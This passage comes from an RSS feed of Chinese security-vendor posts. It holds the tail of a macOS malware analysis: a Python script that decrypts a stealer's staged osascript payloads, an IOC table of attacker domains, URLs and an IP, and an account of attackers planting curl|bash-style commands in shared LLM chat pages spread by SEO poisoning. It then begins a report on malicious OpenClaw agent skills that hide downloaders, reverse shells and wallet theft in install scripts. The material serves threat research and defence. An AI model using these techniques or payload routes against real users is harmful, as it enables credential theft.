leaf=""> 0x100146EE0</span></span><span leaf=""><br/></span><span leaf="">    base_sub =</span><span style="color: #79c0ff;"><span leaf=""> 0x1000A4AB0</span></span><span leaf=""><br/></span><span leaf="">    total =</span><span style="color: #79c0ff;"><span leaf=""> 166156</span></span><span style="color: #8b949e;"><span leaf="">  # a1[1]</span></span><span leaf=""><br/></span><span leaf="">    out =</span><span style="color: #ffa657;"><span leaf=""> bytearray</span></span><span leaf="">(total)</span><span leaf=""><br/></span><span leaf="">    v3 =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span leaf=""><br/></span><span leaf="">    v4 =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span leaf=""><br/></span><span leaf="">    i =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    while</span></span><span leaf=""> i != total:</span><span leaf=""><br/></span><span leaf="">        v7 = read_dword(base1 + v3)</span><span leaf=""><br/></span><span leaf="">        v8 = (v7 - read_dword(base2 + v3)) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFFFFFFFF</span></span><span leaf=""><br/></span><span leaf="">        shift = read_byte(base_shift + v3) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 7</span></span><span leaf=""><br/></span><span leaf="">        hi = (v8 &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFF</span></span><span leaf="">) &gt;&gt; shift</span><span leaf=""><br/></span><span leaf="">        lo = (v8 &lt;&lt; ((-shift) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 7</span></span><span leaf="">)) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFF</span></span><span leaf=""><br/></span><span leaf="">        b = ((read_byte(base_xor + v3) ^ (hi | lo)) - read_byte(base_sub + v3)) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFF</span></span><span leaf=""><br/></span><span leaf="">        out[i] = b</span><span leaf=""><br/></span><span leaf="">        v4 = ((-</span><span style="color: #79c0ff;"><span leaf="">1640531535</span></span><span leaf=""> * v4) ^ v7) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFFFFFFFF</span></span><span leaf=""><br/></span><span leaf="">        v3 +=</span><span style="color: #79c0ff;"><span leaf=""> 4</span></span><span leaf=""><br/></span><span leaf="">        i +=</span><span style="color: #79c0ff;"><span leaf=""> 1</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    return</span></span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">(out)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> build_alphabet</span></span><span leaf="">() -&gt;</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">:</span><span leaf=""><br/></span><span leaf="">    s0 = build_string_like_sub_100001060()</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    return</span></span><span leaf=""> hex_decode_from_bytes(s0)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> build_cipher1</span></span><span leaf="">() -&gt;</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">:</span><span leaf=""><br/></span><span leaf="">    base =</span><span style="color: #79c0ff;"><span leaf=""> 0x10032DB78</span></span><span leaf=""><br/></span><span leaf="">    length =</span><span style="color: #79c0ff;"><span leaf=""> 4056</span></span><span style="color: #8b949e;"><span leaf="">  # 循环 i != 4056</span></span><span leaf=""><br/></span><span leaf="">    v_buf =</span><span style="color: #ffa657;"><span leaf=""> bytearray</span></span><span leaf="">(length)</span><span leaf=""><br/></span><span leaf="">    v3 =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span leaf=""><br/></span><span leaf="">    v13 =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    for</span></span><span leaf=""> i</span><span style="color: #ff7b72;"><span leaf=""> in</span></span><span style="color: #ffa657;"><span leaf=""> range</span></span><span leaf="">(length):</span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">        # 每 12 字节一条记录: [a (dword), b (dword), shift (dword)]</span></span><span leaf="">        rec = base + i *</span><span style="color: #79c0ff;"><span leaf=""> 12</span></span><span leaf=""><br/></span><span leaf="">        a = read_dword(rec -</span><span style="color: #79c0ff;"><span leaf=""> 8</span></span><span leaf="">)</span><span style="color: #8b949e;"><span leaf="">  # *((_DWORD*)v14 - 2)</span></span><span leaf=""><br/></span><span leaf="">        b = read_dword(rec -</span><span style="color: #79c0ff;"><span leaf=""> 4</span></span><span leaf="">)</span><span style="color: #8b949e;"><span leaf="">  # *((_DWORD*)v14 - 1)</span></span><span leaf=""><br/></span><span leaf="">        shift = read_byte(rec)</span><span style="color: #8b949e;"><span leaf="">   # *v14</span></span><span leaf=""><br/></span><span leaf="">        val = ((a ^ (</span><span style="color: #79c0ff;"><span leaf="">3</span></span><span leaf=""> * b)) &gt;&gt; shift) - b</span><span leaf=""><br/></span><span leaf="">        v_buf[i] = val &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFF</span></span><span leaf=""><br/></span><span leaf="">        v13 = ((-</span><span style="color: #79c0ff;"><span leaf="">1640531535</span></span><span leaf=""> * v13) ^ a) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFFFFFFFF</span></span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    # v_buf 里就是 ASCII hex 字符串</span></span><span style="color: #ff7b72;"><span leaf="">    return</span></span><span leaf=""> hex_decode_from_bytes(</span><span style="color: #ffa657;"><span leaf="">bytes</span></span><span leaf="">(v_buf))</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> build_cipher2</span></span><span leaf="">() -&gt;</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">:</span><span leaf=""><br/></span><span leaf="">    s = build_bytes_like_sub_100000F60()</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    return</span></span><span leaf=""> hex_decode_from_bytes(s)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> build_alpha_map</span></span><span leaf="">(</span><span leaf="">alphabet:</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">) -&gt;</span><span style="color: #ffa657;"><span leaf=""> dict</span></span><span leaf="">:</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    return</span></span><span leaf=""> {alphabet[i]: i</span><span style="color: #ff7b72;"><span leaf=""> for</span></span><span leaf=""> i</span><span style="color: #ff7b72;"><span leaf=""> in</span></span><span style="color: #ffa657;"><span leaf=""> range</span></span><span leaf="">(</span><span style="color: #ffa657;"><span leaf="">len</span></span><span leaf="">(alphabet))}</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> decode_custom_base64</span></span><span leaf="">(</span><span leaf="">cipher:</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">, alpha_map:</span><span style="color: #ffa657;"><span leaf=""> dict</span></span><span leaf="">) -&gt;</span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">:</span><span leaf=""><br/></span><span leaf="">    acc =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span leaf=""><br/></span><span leaf="">    bitlen =</span><span style="color: #79c0ff;"><span leaf=""> 0</span></span><span leaf=""><br/></span><span leaf="">    out =</span><span style="color: #ffa657;"><span leaf=""> bytearray</span></span><span leaf="">()</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    for</span></span><span leaf=""> c</span><span style="color: #ff7b72;"><span leaf=""> in</span></span><span leaf=""> cipher:</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">        if</span></span><span leaf=""> c</span><span style="color: #ff7b72;"><span leaf=""> not</span></span><span style="color: #ff7b72;"><span leaf=""> in</span></span><span leaf=""> alpha_map:</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">            continue</span></span><span leaf="">        val = alpha_map[c] &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0x3F</span></span><span leaf=""><br/></span><span leaf="">        acc = (acc &lt;&lt;</span><span style="color: #79c0ff;"><span leaf=""> 6</span></span><span leaf="">) | val</span><span leaf=""><br/></span><span leaf="">        bitlen +=</span><span style="color: #79c0ff;"><span leaf=""> 6</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">        while</span></span><span leaf=""> bitlen &gt;=</span><span style="color: #79c0ff;"><span leaf=""> 8</span></span><span leaf="">:</span><span leaf=""><br/></span><span leaf="">            bitlen -=</span><span style="color: #79c0ff;"><span leaf=""> 8</span></span><span leaf=""><br/></span><span leaf="">            out.append((acc &gt;&gt; bitlen) &amp;</span><span style="color: #79c0ff;"><span leaf=""> 0xFF</span></span><span leaf="">)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">    return</span></span><span style="color: #ffa657;"><span leaf=""> bytes</span></span><span leaf="">(out)</span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">def</span></span><span style="color: #d2a8ff;"><span leaf=""> main</span></span><span leaf="">():</span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    # 1) 构造 base64 字母表</span></span><span leaf="">    alphabet = build_alphabet()</span><span leaf=""><br/></span><span leaf="">    alpha_map = build_alpha_map(alphabet)</span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    # 2) 第一段：使用 unk_10032DB78 对应的 hex -&gt; bytes，再自定义 base64 解码</span></span><span leaf="">    key1 = build_cipher1()</span><span leaf=""><br/></span><span leaf="">    script1 = decode_custom_base64(key1, alpha_map)</span><span style="color: #ffa657;"><span leaf=""><br/></span><span leaf="">    print</span></span><span leaf="">(</span><span style="color: #a5d6ff;"><span leaf="">&#34;[*] Stage1 script/command:&#34;</span></span><span leaf="">)</span><span style="color: #ffa657;"><span leaf=""><br/></span><span leaf="">    print</span></span><span leaf="">(script1.decode(</span><span style="color: #a5d6ff;"><span leaf="">&#39;utf-8&#39;</span></span><span leaf="">, errors=</span><span style="color: #a5d6ff;"><span leaf="">&#39;replace&#39;</span></span><span leaf="">))</span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    # 3) 第二段：使用 sub_100000F60 的大表</span></span><span leaf="">    key2 = build_cipher2()</span><span leaf=""><br/></span><span leaf="">    script2 = decode_custom_base64(key2, alpha_map)</span><span style="color: #ffa657;"><span leaf=""><br/></span><span leaf="">    print</span></span><span leaf="">(</span><span style="color: #a5d6ff;"><span leaf="">&#34;[*] Stage2 script/command:&#34;</span></span><span leaf="">)</span><span style="color: #ffa657;"><span leaf=""><br/></span><span leaf="">    print</span></span><span leaf="">(script2.decode(</span><span style="color: #a5d6ff;"><span leaf="">&#39;utf-8&#39;</span></span><span leaf="">, errors=</span><span style="color: #a5d6ff;"><span leaf="">&#39;replace&#39;</span></span><span leaf="">))</span><span style="color: #8b949e;"><span leaf=""><br/></span><span leaf="">    # 4) 第三段：start() 里 case 3 部分同样用第二批表 + 相同 alphabet，</span></span><span style="color: #8b949e;"><span leaf="">    #    实际上 script2 通常已经包含进一步要执行的命令/脚本</span></span><span style="color: #ff7b72;"><span leaf=""><br/></span><span leaf="">if</span></span><span leaf=""> __name__ ==</span><span style="color: #a5d6ff;"><span leaf=""> &#34;__main__&#34;</span></span><span leaf="">:</span><span leaf=""><br/></span><span leaf="">    main()</span></code></pre><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">解密后的脚本函数名，关键字符经过混淆，分析为同类功能的osascript窃密功能脚本。</span></p><figure style="margin: 1.5em 8px;color: #3f3f3f;"><span leaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100027484" data-ratio="0.5898148148148148" style="display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=ba9a96bc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUmFib3434GOkltwlLsMtnMWiaBXmHOw55DicxYNJjS3rkiaGGia7ueH0M6jsiaAibE0icwmsCpIqRdEsnyMdM7pk9n5AZs320XX9bciafs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><h2 data-heading="true" style="display: table;padding: 0px 0.2em;margin: 8px auto 16px;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: 19.2px;font-weight: bold;text-align: center;"><span leaf="">IOCs</span></h2><p style="font-family: -apple-system-font,BlinkMacSystemFont, Helvetica Neue, PingFang SC, Hiragino Sans GB , Microsoft YaHei UI , Microsoft YaHei ,Arial,sans-serif;font-size: 16px;line-height: 1.75;text-align: left;max-width: 100%;overflow: auto;"><table style="color:#3f3f3f;margin-top:0 !important;width:558px;"><thead><tr><th data-colwidth="94" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">类型</span></p></th><th data-colwidth="464" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;background: rgba(0, 0, 0, 0.05);"><p><span leaf="">IOC</span></p></th></tr></thead><tbody><tr><td data-colwidth="94" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">MD5</span></p></td><td data-colwidth="464" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">a2c4aea6f5b6f32aa2ee5013da4094db</span></p></td></tr><tr><td data-colwidth="94" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"></td><td data-colwidth="464" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">deba7147df76bb068915fa0fd24c91c2</span></p></td></tr><tr><td data-colwidth="94" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">DOMAIN</span></p></td><td data-colwidth="464" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">contatoplus[.]com</span></p></td></tr><tr><td data-colwidth="94" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">URL</span></p></td><td data-colwidth="464" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">hxxps://contatoplus.com/curl/Ka2842.d99683a65d1Jedf47H6aJce.56H47d099f<a class="wx_topic_link" topic-id="mmahsti8-t0cp1k" style="color: #576B95 !important;" data-topic="1">#6e7eb</a>&amp;H7m7dm3d01fb7c23</span></p></td></tr><tr><td data-colwidth="94" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"></td><td data-colwidth="464" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">hxxps://contatoplus.com/notebook/update</span></p></td></tr><tr><td data-colwidth="94" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">IP</span></p></td><td data-colwidth="464" style="border: 1px solid #dfdfdf;padding: 0.25em 0.5em;color: #3f3f3f;word-break: keep-all;"><p><span leaf="">45.94.47[.]204</span></p></td></tr></tbody></table></p><h2 data-heading="true" style="display: table;padding: 0px 0.2em;margin: 16px auto 8px;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: 19.2px;font-weight: bold;text-align: center;"><span leaf="">结语：当信任成为攻击的阶梯</span></h2><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">本次攻击事件揭示了一种令人警惕的社会工程学攻击范式演变：攻击者不再单纯依赖伪造的界面或粗劣的钓鱼邮件，而是巧妙地将攻击载荷“寄生”在可信度极高的大模型官方平台之上。通过结合搜索引擎的精准分发能力，这种“官方域名+AI回复+SEO投毒”的组合拳，本质上是对现代技术从业者生产力习惯的</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">精准狙击</span></strong><span leaf="">。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">当 AI 助手成为我们大脑的延伸时，安全防御的边界也不再仅仅是防火墙或杀毒软件，而是我们内心最后一道关于“信任”的防线。大模型平台官方链接所带来的“天然安全感”，在攻击者手中变成了一把透明的尖刀，隐蔽地刺向了防备最薄弱的技术生态。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">随着国产大模型调用量的进一步暴涨，此类利用 AI 生态功能进行的隐形攻击预料将持续演化。针对此类威胁，我们建议每一位技术从业者构建以下安全防御准则：</span></p><ol style="padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">1. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">祛除“官方滤镜”，保持逻辑审查</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">对任何来源的代码片段，即使其展示在大模型厂商的官方页面上，执行前也必须进行深度审查。对于任何包含 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">curl | bash</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">powershell -enc</span></code><span leaf="">、大规模 Base64 编码或不明 URL 的指令，应保持最高级别的警惕。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">2. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">辨析“分享”与“生成”的界限</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">搜索引擎结果中的 LLM 链接多为</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">第三方分享的静态记录</span></strong><span leaf="">，不代表平台官方的生成结果，更不代表平台的安全性背书。在处理敏感操作或获取安装指南时，应优先通过平台官网发起</span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">全新的对话</span></strong><span leaf="">，避免使用他人分享的对话链接。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">3. </span><strong style="color: rgba(0, 82, 217, 1);font-weight: bold;font-size: inherit;"><span leaf="">坚持生产环境的物理隔离</span></strong><span leaf="">：</span><span leaf=""><br/></span><span leaf="">对于任何未经审计的脚本或复杂方案，应始终遵循“沙箱优先”原则。在虚拟机或完全隔离的容器环境中进行首轮测试，是防御此类针对主机凭证窃取攻击的最有效手段。</span></p></li></ol><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">在 AI 时代，比算法进化更快的是人性弱点的利用。唯有保持怀疑，方能守护安全。</span></p></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=02e417ce&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511136%26idx%3D1%26sn%3D70d5eaf376647f64e3753c6710bb466b">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 04 Mar 2026 10:01:00 +0800</pubDate>
    </item>
    <item>
      <title>腾讯云安全威胁情报SKill安全守护计划发布</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511088&amp;idx=1&amp;sn=652370ddb00c4d2a2e075c3b3635f564</link>
      <description>AI Agent时代，Skill供应链安全成新战场。科恩实验室首创大模型+沙箱双引擎研判，构建全生命周期威胁闭环，守护智能体生态安全基石。</description>
      <content:encoded><![CDATA[<p><span>腾讯威胁情报中心</span> <span>2026-03-03 17:38</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=0efd5093&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwWaOhogsaumKiaibhlnDGoNvffzPtZ871d7aOQ5zt5yhuagLiajjXC1eM4KIKTnJic5vZdUrdV9gsYKsxpBmPH2XQCsMmsHeHjPFT0%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>AI Agent时代，Skill供应链安全成新战场。科恩实验室首创大模型+沙箱双引擎研判，构建全生命周期威胁闭环，守护智能体生态安全基石。</p>
  <p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-backh="1994" data-backw="578" data-imgfileid="100027439" data-ratio="3.45" data-s="300,640" type="block" data-type="png" data-w="2000" style="width:100%;" src="https://wechat2rss.xlab.app/img-proxy/?k=cf1ec1d6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwWExU8If4Z6n6AnKB4GGNdViaBibALMtbH19aicqoEMYrBIJDrIZiaT0QL3Q3QZc5iatq9hTSj90iakpM4BpJFYGGqA5GbgW9TIIgodw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a7b3d58b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511088%26idx%3D1%26sn%3D652370ddb00c4d2a2e075c3b3635f564">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 03 Mar 2026 17:38:00 +0800</pubDate>
    </item>
    <item>
      <title>警惕你的Skills：OpenClaw开源生态skills风险分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511034&amp;idx=1&amp;sn=2166096437a964129f5dec744fff6793</link>
      <description>攻击者通过伪造热门插件并上传至ClawHub技能平台，诱导用户安装恶意技能（Skill），形成一类高隐蔽性攻击。这些恶意样本通常伪装为“浏览器助手、社交代理、财经工具”等常见类别，通过仿冒官方页面布局与文件结构，仅在安装脚本中隐藏后门逻辑。</description>
      <content:encoded><![CDATA[<p><span></span> <span>2026-02-04 18:16</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=e502e591&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXT6yhMqicBNAATK3WCkr0lmibxq0IGT80fuXYvcSuxcp7HNfbQ7eQApkAmTXqzkKsdUHKDuoWzfcPkLPbv9ANVrBPZXzb6DjhYY%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>攻击者通过伪造热门插件并上传至ClawHub技能平台，诱导用户安装恶意技能（Skill），形成一类高隐蔽性攻击。这些恶意样本通常伪装为“浏览器助手、社交代理、财经工具”等常见类别，通过仿冒官方页面布局与文件结构，仅在安装脚本中隐藏后门逻辑。</p>
  <div data-mpa-template="t" mpa-from-tpl="t" data-mpa-action-id="malurube3fq" data-pm-slice="0 0 []"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 14px;padding-top: 3px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="background: linear-gradient(90deg, #7394ff 0%, #3f5bfe 100%);border-radius: 0px 13px 0px 13px;text-align: center;padding: 4px 18px;z-index: 2;" data-mid="" mpa-from-tpl="t"><p style="font-weight: bold;font-size: 17px;color: #ffffff;line-height: 24px;text-shadow: 0px 1px 1px rgba(0, 0, 0, 0.5);" data-mid="" mpa-is-content="t"><span leaf="">项目概览与风险背景</span></p></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="malyjiiv20l2"><div style="width: 100%;display: flex;justify-content: center;align-items: center;padding: 0px 12px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5583333333333333" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100027374" src="https://wechat2rss.xlab.app/img-proxy/?k=fcfcdedf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWFGPibpXFiboCzLY9EZicleflAQF12LabJTFlK3rJZyFLwudR6HUHIzuHuTqgswIbSaDfBsR4Oyxaj2I4WFF5GkmfcXBnj6sFrGw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="align-self: flex-start;width: 200px;height: 7px;margin-bottom: -3.5px;z-index: 1;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.035" data-w="400" style="display: block;" src="https://wechat2rss.xlab.app/img-proxy/?k=1f2492b6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FRFOccUKcsRfYb7MADoD4hX4vFicBcNZoU8ovswJKFicDMXYSnNP1ibtn3ibaNicmuGlUodFI8ibAVoIdSJ2ccRKgyp5g%2F640"/></p><div style="width: 100%;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;background: #F2F9FF;padding: 14px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 14px;font-family: PingFangSC-Regular, &#34;PingFang SC&#34;;color: rgb(45, 125, 205);line-height: 24px;text-indent: 2em;margin-top: 0px;" data-mid="" mpa-is-content="t"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">近日，OpenClaw的爆发式传播引发了安全领域的广泛关注。</span></span></p><p><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">OpenClaw（原名 MoltBot / ClawdBot）是一个开源的“个人 AI 助理”项目，旨在帮助用户在本地设备上运行具备自主行为的人工智能代理（Agent）。OpenClaw 自 2026 年 1 月起在开源社区迅速爆红，仅两周内 GitHub 星标数突破十万，成为当月增长最快的项目之一。这一爆发式传播也引发了安全领域的广泛关注。</span></span></p><p style="text-indent: 2em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">科恩实验室威胁情报团队针对项目快速普及可能产生的安全风险，启动了专项威胁情报研究，梳理了相关公开CVE漏洞信息。同时，</span><span textstyle="" style="font-size: 14px;color: rgb(0, 0, 0);font-weight: bold;">我们发现攻击者通过伪造热门插件并上传至ClawHub技能平台</span><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">，诱导用户安装恶意技能（Skill），形成一类高隐蔽性攻击。这些恶意样本通常伪装为“浏览器助手、社交代理、财经工具”等常见类别，通过</span><span textstyle="" style="font-size: 14px;color: rgb(0, 0, 0);font-weight: bold;">仿冒官方页面布局与文件结构</span><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">，仅在安装脚本中隐藏后门逻辑，以规避用户与平台审核。</span></span></p><p style="text-indent: 2em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">通过对clawhub平台公开技能的全量分析，我们确认近</span><span textstyle="" style="font-size: 14px;color: rgb(0, 0, 0);font-weight: bold;">10%的技能样本存在安全风险</span><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">，主要威胁包括木马下载执行、Web3钱包信息窃取、用户数据外传等。恶意技能安装后，普遍使用统一模板下载远程负载，部分样本甚至直接植入反弹Shell或窃取浏览器本地数据。进一步溯源分析表明，相关木马与信息窃取家族Nova Stealer高度相似，通过MaaS（恶意软件即服务）模式进行传播，已形成完整的攻击链路。</span></span></p><p style="text-indent: 2em;"><span leaf=""><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);">OpenClaw核心特性是在接入多种日常应用渠道的同时，调用大型语言模型（如 Anthropic Claude、OpenAI GPT 等）解析用户意图并自动执行操作。OpenClaw 支持多通道消息收发，可同时接入多个聊天平台并实现跨平台指令路由。同时具备语音交互、Canvas 实时绘图界面、多智能体隔离等增强特性，使其成为一个常驻后台、可跨平台运行的全功能 AI 助理系统。这种全托管的智能特性受到不少用户的关注，同时也成为给攻击者大开方便之门的隐患。</span></span></p></div><p style="width: 13px;height: 18px;margin-right: 6px;margin-top: -24px;margin-bottom: 6px;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.3846153846153846" data-w="26" style="display: block;" src="https://wechat2rss.xlab.app/img-proxy/?k=f4d1b9d7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FDC72Via3tCEcbTQw6wMAvEPO1Ijq6dQPRXpFJmS9ewhgwxvibpMSmybKtTXqIRohV0ibxLLuhjuWFoibFeJuoibCfAA%2F640"/></p><p style="width: 200px;height: 7px;margin-top: -3.5px;transform: rotateY(180deg);" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.035" data-w="400" style="display: block;" 